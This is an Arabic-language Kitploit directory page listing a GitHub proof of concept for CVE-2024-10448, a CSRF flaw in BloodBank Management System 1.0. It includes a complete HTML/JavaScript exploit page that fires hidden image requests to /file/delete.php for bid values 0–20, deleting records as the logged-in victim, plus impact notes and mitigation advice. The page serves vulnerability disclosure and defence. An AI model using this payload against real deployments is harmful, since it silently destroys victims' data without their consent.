Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10448 — هجوم CSRF على بنك الدم POC | Kitploit
أدوات/GitHubGitHub/bevennyamande/cve-2024-10448
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

هجوم CSRF على بنك الدم POC

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الإصدار المتأثر:

  • BloodBank Management System: 1.0

معلومات الثغرة:

  • نوع الثغرة: Cross Site Request Forgery (CSRF)
  • الخطورة: عالية
  • الحالة: غير مصحح

نقطة النهاية الضعيفة:

  • المسار: /file/delete.php?bid=

وصف الثغرة:

تم اكتشاف ثغرة من نوع Cross Site Request Forgery (CSRF) في وظيفة طلب الدم في نظام BloodBank Management System. يحدث هذا الخلل عند إرسال طلب delete إلى هذا المسار /file/delete.php?bid= مما يسمح للمعامل بتحديد سجل لحذفه من التطبيق. ومع ذلك، فإن ديناميكية وتعتمد على إضافة عينات الدم، لذا لجعل الطلب ناجحًا، استخدمت علامة صورة مولدة بواسطة javascript داخل حلقة.

bid
bids

يمكن أن يؤدي الاستغلال الناجح إلى إجراءات غير مصرح بها مثل حذف البيانات نيابة عن الضحية. بالإضافة إلى ذلك، يمكن استغلال ذلك بزيارة مواقع ويب ضارة تحتوي على الحمولة.


إثبات المفهوم (PoC):

فيما يلي مثال على هجوم إثبات المفهوم CSRF الذي يحذف عينات الدم المتاحة عبر المعامل bid، استضفت الملف على نطاق يتحكم به المهاجم، في حالتي كنت أستخدم localhost:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


فيديو إثبات المفهوم

  • رابط الفيديو

التأثير:

  • التلاعب بالبيانات: يمكن للمهاجمين تعديل المحتوى المعروض للمستخدمين.
  • الضرر السمعة: قد يفقد المستخدمون الثقة في النظام بسبب السلوك الضار.

توصيات التخفيف:

  1. استخدام رمز CSRF قم بتطبيق آلية لمنع الوصول عبر النطاقات أو وضع csrf tokens في طلباتك، وتجنب أيضًا استخدام طلبات GET لإجراء تغييرات في الحالة.
تنزيل الأداة